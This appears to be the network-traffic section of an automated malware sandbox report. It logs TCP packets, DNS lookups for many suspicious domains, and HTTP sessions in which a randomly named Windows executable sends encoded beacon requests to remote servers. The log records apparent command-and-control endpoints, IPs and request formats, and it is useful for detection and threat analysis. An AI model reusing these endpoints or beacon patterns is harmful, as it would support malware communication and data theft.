Nov 6, 2024 16:02:07.117341995 CET  80           49748      47.52.221.8    192.168.2.8
Nov 6, 2024 16:02:07.117430925 CET  49748        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:07.117430925 CET  49748        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:07.121651888 CET  49748        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:07.126507044 CET  80           49748      47.52.221.8    192.168.2.8
Nov 6, 2024 16:02:12.217765093 CET  49749        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:12.222831011 CET  80           49749      23.106.59.18   192.168.2.8
Nov 6, 2024 16:02:12.222913980 CET  49749        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:12.236635923 CET  49749        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:12.241656065 CET  80           49749      23.106.59.18   192.168.2.8
Nov 6, 2024 16:02:13.027827024 CET  80           49749      23.106.59.18   192.168.2.8
Nov 6, 2024 16:02:13.077625036 CET  49749        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:13.133052111 CET  80           49749      23.106.59.18   192.168.2.8
Nov 6, 2024 16:02:13.133657932 CET  49749        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:13.747538090 CET  49749        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:14.769628048 CET  49750        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:14.774583101 CET  80           49750      23.106.59.18   192.168.2.8
Nov 6, 2024 16:02:14.781706095 CET  49750        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:14.789623022 CET  49750        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:14.794708014 CET  80           49750      23.106.59.18   192.168.2.8
Nov 6, 2024 16:02:15.593745947 CET  80           49750      23.106.59.18   192.168.2.8
Nov 6, 2024 16:02:15.638135910 CET  49750        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:15.708977938 CET  80           49750      23.106.59.18   192.168.2.8
Nov 6, 2024 16:02:15.709033012 CET  49750        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:16.294604063 CET  49750        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:17.318176031 CET  49751        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:17.323261976 CET  80           49751      23.106.59.18   192.168.2.8
Nov 6, 2024 16:02:17.323411942 CET  49751        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:17.341619015 CET  49751        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:17.346571922 CET  80           49751      23.106.59.18   192.168.2.8
Nov 6, 2024 16:02:17.347063065 CET  80           49751      23.106.59.18   192.168.2.8
Nov 6, 2024 16:02:18.151864052 CET  80           49751      23.106.59.18   192.168.2.8
Nov 6, 2024 16:02:18.200623035 CET  49751        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:18.257029057 CET  80           49751      23.106.59.18   192.168.2.8
Nov 6, 2024 16:02:18.257124901 CET  49751        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:18.841361046 CET  49751        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:19.862824917 CET  49752        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:19.868144035 CET  80           49752      23.106.59.18   192.168.2.8
Nov 6, 2024 16:02:19.868220091 CET  49752        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:19.900156021 CET  49752        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:19.905149937 CET  80           49752      23.106.59.18   192.168.2.8
Nov 6, 2024 16:02:20.672406912 CET  80           49752      23.106.59.18   192.168.2.8
Nov 6, 2024 16:02:20.717614889 CET  49752        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:20.778609037 CET  80           49752      23.106.59.18   192.168.2.8
Nov 6, 2024 16:02:20.778852940 CET  49752        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:20.783970118 CET  49752        80         192.168.2.8    23.106.59.18
Nov 6, 2024 16:02:20.788876057 CET  80           49752      23.106.59.18   192.168.2.8
Nov 6, 2024 16:02:34.244836092 CET  49753        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:34.249686003 CET  80           49753      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:34.249757051 CET  49753        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:34.262506008 CET  49753        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:34.267330885 CET  80           49753      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:34.861283064 CET  80           49753      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:34.861358881 CET  49753        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:35.778759956 CET  49753        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:35.898998022 CET  80           49753      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:36.801583052 CET  49754        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:36.806385994 CET  80           49754      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:36.813572884 CET  49754        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:36.825593948 CET  49754        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:36.831317902 CET  80           49754      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:37.421328068 CET  80           49754      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:37.421607971 CET  49754        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:38.325674057 CET  49754        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:38.331007957 CET  80           49754      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:39.344834089 CET  49755        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:39.349730015 CET  80           49755      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:39.349860907 CET  49755        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:39.363594055 CET  49755        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:39.368467093 CET  80           49755      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:39.368597984 CET  80           49755      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:40.553761005 CET  80           49755      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:40.553864956 CET  49755        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:40.554442883 CET  80           49755      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:40.554503918 CET  49755        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:40.554800034 CET  80           49755      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:40.554840088 CET  49755        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:40.873564959 CET  49755        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:40.878566027 CET  80           49755      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:41.892931938 CET  49756        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:41.897813082 CET  80           49756      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:41.897895098 CET  49756        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:41.907115936 CET  49756        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:41.911937952 CET  80           49756      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:42.976943016 CET  80           49756      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:42.976991892 CET  80           49756      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:42.977005959 CET  80           49756      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:42.977122068 CET  49756        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:42.978435993 CET  80           49756      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:42.978718042 CET  49756        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:42.981555939 CET  49756        80         192.168.2.8    208.91.197.27
Nov 6, 2024 16:02:42.986270905 CET  80           49756      208.91.197.27  192.168.2.8
Nov 6, 2024 16:02:48.034312010 CET  49757        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:02:48.039263010 CET  80           49757      3.33.130.190   192.168.2.8
Nov 6, 2024 16:02:48.039339066 CET  49757        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:02:48.054140091 CET  49757        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:02:48.059220076 CET  80           49757      3.33.130.190   192.168.2.8
Nov 6, 2024 16:02:48.664647102 CET  80           49757      3.33.130.190   192.168.2.8
Nov 6, 2024 16:02:48.664710999 CET  49757        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:02:49.560036898 CET  49757        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:02:49.566308975 CET  80           49757      3.33.130.190   192.168.2.8
Nov 6, 2024 16:02:50.579462051 CET  49758        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:02:50.586746931 CET  80           49758      3.33.130.190   192.168.2.8
Nov 6, 2024 16:02:50.586822987 CET  49758        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:02:50.599817991 CET  49758        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:02:50.604614973 CET  80           49758      3.33.130.190   192.168.2.8
Nov 6, 2024 16:02:51.218439102 CET  80           49758      3.33.130.190   192.168.2.8
Nov 6, 2024 16:02:51.218660116 CET  49758        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:02:52.106898069 CET  49758        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:02:52.111721039 CET  80           49758      3.33.130.190   192.168.2.8
Nov 6, 2024 16:02:53.125574112 CET  49759        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:02:53.130480051 CET  80           49759      3.33.130.190   192.168.2.8
Nov 6, 2024 16:02:53.130639076 CET  49759        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:02:53.145545006 CET  49759        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:02:53.150552988 CET  80           49759      3.33.130.190   192.168.2.8
Nov 6, 2024 16:02:53.150563955 CET  80           49759      3.33.130.190   192.168.2.8
Nov 6, 2024 16:02:53.795929909 CET  80           49759      3.33.130.190   192.168.2.8
Nov 6, 2024 16:02:53.795993090 CET  49759        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:02:54.653959990 CET  49759        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:02:54.659282923 CET  80           49759      3.33.130.190   192.168.2.8
Nov 6, 2024 16:02:55.677532911 CET  49760        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:02:55.682605982 CET  80           49760      3.33.130.190   192.168.2.8
                                                                                        Nov 6, 2024 16:02:55.685703993 CET4976080192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:55.693525076 CET4976080192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:55.698440075 CET80497603.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:56.323554993 CET80497603.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:56.324234009 CET80497603.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:56.324278116 CET4976080192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:56.327158928 CET4976080192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:56.333044052 CET80497603.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:03:13.319590092 CET4976180192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:03:13.324541092 CET80497613.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:03:13.324619055 CET4976180192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:03:13.332119942 CET4976180192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:03:13.336913109 CET80497613.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:03:13.974917889 CET80497613.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:03:13.981266975 CET80497613.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:03:13.981317043 CET4976180192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:03:15.152443886 CET4976180192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:03:15.158137083 CET80497613.33.130.190192.168.2.8
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 6, 2024 15:59:37.625431061 CET6401653192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 15:59:37.970403910 CET53640161.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 15:59:53.673338890 CET6266053192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 15:59:53.744705915 CET53626601.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:00:07.330297947 CET6366853192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:00:07.487843037 CET53636681.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:00:20.891988039 CET6291453192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:00:20.939755917 CET53629141.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:00:34.314397097 CET5995553192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:00:34.473757029 CET53599551.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:00:47.955921888 CET5335753192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:00:48.365322113 CET53533571.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:01:02.508001089 CET5777753192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:01:02.572767973 CET53577771.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:01:16.315160036 CET5571353192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:01:16.365669966 CET53557131.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:01:29.986882925 CET5790353192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:01:29.999608994 CET53579031.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:01:43.313997030 CET5435053192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:01:43.474385977 CET53543501.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:01:57.486531973 CET6262353192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:01:57.989701033 CET53626231.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:02:12.128015041 CET6123653192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:02:12.214703083 CET53612361.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:02:25.827563047 CET5121953192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:02:25.879390955 CET53512191.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:02:33.956643105 CET5372653192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:02:34.241292953 CET53537261.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:02:47.987097025 CET6218753192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:02:48.030374050 CET53621871.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:03:01.345509052 CET6160153192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:03:01.432965994 CET53616011.1.1.1192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 6, 2024 15:59:37.625431061 CET | 192.168.2.8 | 1.1.1.1 | 0x1ce0 | Standard query (0) | www.corpseflowerwatch.org | A (IP address) | IN (0x0001) | false
Nov 6, 2024 15:59:53.673338890 CET | 192.168.2.8 | 1.1.1.1 | 0xa2b0 | Standard query (0) | www.4nk.education | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:00:07.330297947 CET | 192.168.2.8 | 1.1.1.1 | 0xfe12 | Standard query (0) | www.migraine-massages.pro | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:00:20.891988039 CET | 192.168.2.8 | 1.1.1.1 | 0x1822 | Standard query (0) | www.vnxoso88.art | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:00:34.314397097 CET | 192.168.2.8 | 1.1.1.1 | 0xfd33 | Standard query (0) | www.pluribiz.life | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:00:47.955921888 CET | 192.168.2.8 | 1.1.1.1 | 0xc630 | Standard query (0) | www.kdtzhb.top | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:01:02.508001089 CET | 192.168.2.8 | 1.1.1.1 | 0x464a | Standard query (0) | www.evoo.website | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:01:16.315160036 CET | 192.168.2.8 | 1.1.1.1 | 0xe917 | Standard query (0) | www.astorg-group.info | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:01:29.986882925 CET | 192.168.2.8 | 1.1.1.1 | 0xef1d | Standard query (0) | www.fiqsth.vip | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:01:43.313997030 CET | 192.168.2.8 | 1.1.1.1 | 0x1469 | Standard query (0) | www.bio-thymus.com | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:01:57.486531973 CET | 192.168.2.8 | 1.1.1.1 | 0xf0b5 | Standard query (0) | www.wukong.college | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:02:12.128015041 CET | 192.168.2.8 | 1.1.1.1 | 0xb33e | Standard query (0) | www.vehiculargustav.click | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:02:25.827563047 CET | 192.168.2.8 | 1.1.1.1 | 0x984e | Standard query (0) | www.bulls777.pro | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:02:33.956643105 CET | 192.168.2.8 | 1.1.1.1 | 0xb624 | Standard query (0) | www.yushaliu.online | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:02:47.987097025 CET | 192.168.2.8 | 1.1.1.1 | 0x811b | Standard query (0) | www.marketprediction.app | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:03:01.345509052 CET | 192.168.2.8 | 1.1.1.1 | 0xe416 | Standard query (0) | www.066bet.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 6, 2024 15:59:37.970403910 CET | 1.1.1.1 | 192.168.2.8 | 0x1ce0 | No error (0) | www.corpseflowerwatch.org | corpseflowerwatch.org |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 15:59:37.970403910 CET | 1.1.1.1 | 192.168.2.8 | 0x1ce0 | No error (0) | corpseflowerwatch.org |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 15:59:37.970403910 CET | 1.1.1.1 | 192.168.2.8 | 0x1ce0 | No error (0) | corpseflowerwatch.org |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 15:59:53.744705915 CET | 1.1.1.1 | 192.168.2.8 | 0xa2b0 | No error (0) | www.4nk.education | webredir.vip.gandi.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 15:59:53.744705915 CET | 1.1.1.1 | 192.168.2.8 | 0xa2b0 | No error (0) | webredir.vip.gandi.net |  | 217.70.184.50 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:00:07.487843037 CET | 1.1.1.1 | 192.168.2.8 | 0xfe12 | No error (0) | www.migraine-massages.pro |  | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:00:20.939755917 CET | 1.1.1.1 | 192.168.2.8 | 0x1822 | No error (0) | www.vnxoso88.art | vnxoso88.art |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 16:00:20.939755917 CET | 1.1.1.1 | 192.168.2.8 | 0x1822 | No error (0) | vnxoso88.art |  | 66.29.146.14 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:00:34.473757029 CET | 1.1.1.1 | 192.168.2.8 | 0xfd33 | No error (0) | www.pluribiz.life |  | 209.74.64.58 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:00:48.365322113 CET | 1.1.1.1 | 192.168.2.8 | 0xc630 | No error (0) | www.kdtzhb.top |  | 47.242.89.146 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:01:02.572767973 CET | 1.1.1.1 | 192.168.2.8 | 0x464a | No error (0) | www.evoo.website |  | 128.65.195.180 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:01:16.365669966 CET | 1.1.1.1 | 192.168.2.8 | 0xe917 | No error (0) | www.astorg-group.info | webredir.vip.gandi.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 16:01:16.365669966 CET | 1.1.1.1 | 192.168.2.8 | 0xe917 | No error (0) | webredir.vip.gandi.net |  | 217.70.184.50 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:01:29.999608994 CET | 1.1.1.1 | 192.168.2.8 | 0xef1d | No error (0) | www.fiqsth.vip | fiqsth.vip |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 16:01:29.999608994 CET | 1.1.1.1 | 192.168.2.8 | 0xef1d | No error (0) | fiqsth.vip |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:01:29.999608994 CET | 1.1.1.1 | 192.168.2.8 | 0xef1d | No error (0) | fiqsth.vip |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:01:43.474385977 CET | 1.1.1.1 | 192.168.2.8 | 0x1469 | No error (0) | www.bio-thymus.com | bio-thymus.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 16:01:43.474385977 CET | 1.1.1.1 | 192.168.2.8 | 0x1469 | No error (0) | bio-thymus.com |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:01:43.474385977 CET | 1.1.1.1 | 192.168.2.8 | 0x1469 | No error (0) | bio-thymus.com |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:01:57.989701033 CET | 1.1.1.1 | 192.168.2.8 | 0xf0b5 | No error (0) | www.wukong.college |  | 47.52.221.8 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:02:12.214703083 CET | 1.1.1.1 | 192.168.2.8 | 0xb33e | No error (0) | www.vehiculargustav.click | ppp84k45ss7ehy8ypic5x.limelightcdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 16:02:12.214703083 CET | 1.1.1.1 | 192.168.2.8 | 0xb33e | No error (0) | ppp84k45ss7ehy8ypic5x.limelightcdn.com |  | 23.106.59.18 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:02:25.879390955 CET | 1.1.1.1 | 192.168.2.8 | 0x984e | No error (0) | www.bulls777.pro | bulls777.pro |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 16:02:34.241292953 CET | 1.1.1.1 | 192.168.2.8 | 0xb624 | No error (0) | www.yushaliu.online |  | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:02:48.030374050 CET | 1.1.1.1 | 192.168.2.8 | 0x811b | No error (0) | www.marketprediction.app | marketprediction.app |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 16:02:48.030374050 CET | 1.1.1.1 | 192.168.2.8 | 0x811b | No error (0) | marketprediction.app |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:02:48.030374050 CET | 1.1.1.1 | 192.168.2.8 | 0x811b | No error (0) | marketprediction.app |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:03:01.432965994 CET | 1.1.1.1 | 192.168.2.8 | 0xe416 | Name error (3) | www.066bet.xyz | none | none | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49707 | 3.33.130.190 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 15:59:37.990912914 CET | 387 | OUT | GET /yjfe/?A60d=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYp294ngYYiGslw49G10KSSL4+0zLG2YUwGZkJDIt8ktcvA==&QftlZ=CnaPg8j HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.corpseflowerwatch.org
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 6, 2024 15:59:38.633110046 CET | 406 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Wed, 06 Nov 2024 14:59:38 GMT
Content-Type: text/html
Content-Length: 266
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?A60d=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYp294ngYYiGslw49G10KSSL4+0zLG2YUwGZkJDIt8ktcvA==&QftlZ=CnaPg8j"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49708 | 217.70.184.50 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 15:59:53.764880896 CET | 636 | OUT | POST /gnvu/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 205
Cache-Control: max-age=0
Connection: close
Host: www.4nk.education
Origin: http://www.4nk.education
Referer: http://www.4nk.education/gnvu/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: A60d=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuTXmKM4Co2MoLBNrJwjp0cDm59rNKHKqMTUPgoKQ=
Nov 6, 2024 15:59:54.571353912 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Wed, 06 Nov 2024 14:59:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49709 | 217.70.184.50 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 15:59:56.323050022 CET | 656 | OUT | POST /gnvu/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 225
Cache-Control: max-age=0
Connection: close
Host: www.4nk.education
Origin: http://www.4nk.education
Referer: http://www.4nk.education/gnvu/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 64 4f 72 53 45 71 38 4a 52 62 32 61 4c 68 47 36 30 62 31 42 2b 2f 4f 6d 62 61 54 78 63 42 33 4b 38 4e 69 6b 2b 4b 71 34 62 43 4c 48 73 4a 68 6f 39 44 46 6d 43 30 48 47 72 54 5a 71 42 73 4c 41 53 33 64 4f 77 32 59 72 2b 32 37 59 77 6f 47 2f 71 53 4a 53 39 48 55 74 6f 64 6c 53 56 6a 58 51 69 4d 6b 42 43 69 61 35 32 76 2b 46 74 2f 76 39 56 2b 77 6c 63 47 64 2f 68 67 51 32 4d 65 70 36 75 6e 45 79 36 44 37 4c 39 6f 66 4b 2b 2b 43 6d 66 55 67 2b 63 55 71 75 49 65 57 63 32 74 77 65 45 37 61 6a 71 42 68 79 66 44 4f 53 39 6f 6c 38 43 39 33 6b 4a 33 66 51 32 64 47 64 51 62 6c 70 2f 33 4b 79 72 6e 35 48 30 51 59 52 65 36 33 51
                                                                                        Data Ascii: A60d=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcB3K8Nik+Kq4bCLHsJho9DFmC0HGrTZqBsLAS3dOw2Yr+27YwoG/qSJS9HUtodlSVjXQiMkBCia52v+Ft/v9V+wlcGd/hgQ2Mep6unEy6D7L9ofK++CmfUg+cUquIeWc2tweE7ajqBhyfDOS9ol8C93kJ3fQ2dGdQblp/3Kyrn5H0QYRe63Q
Timestamp: Nov 6, 2024 15:59:57.146554947 CET | Bytes transferred: 608 | Direction: IN | Data:
HTTP/1.1 501 Unsupported method ('POST')
                                                                                        Server: nginx
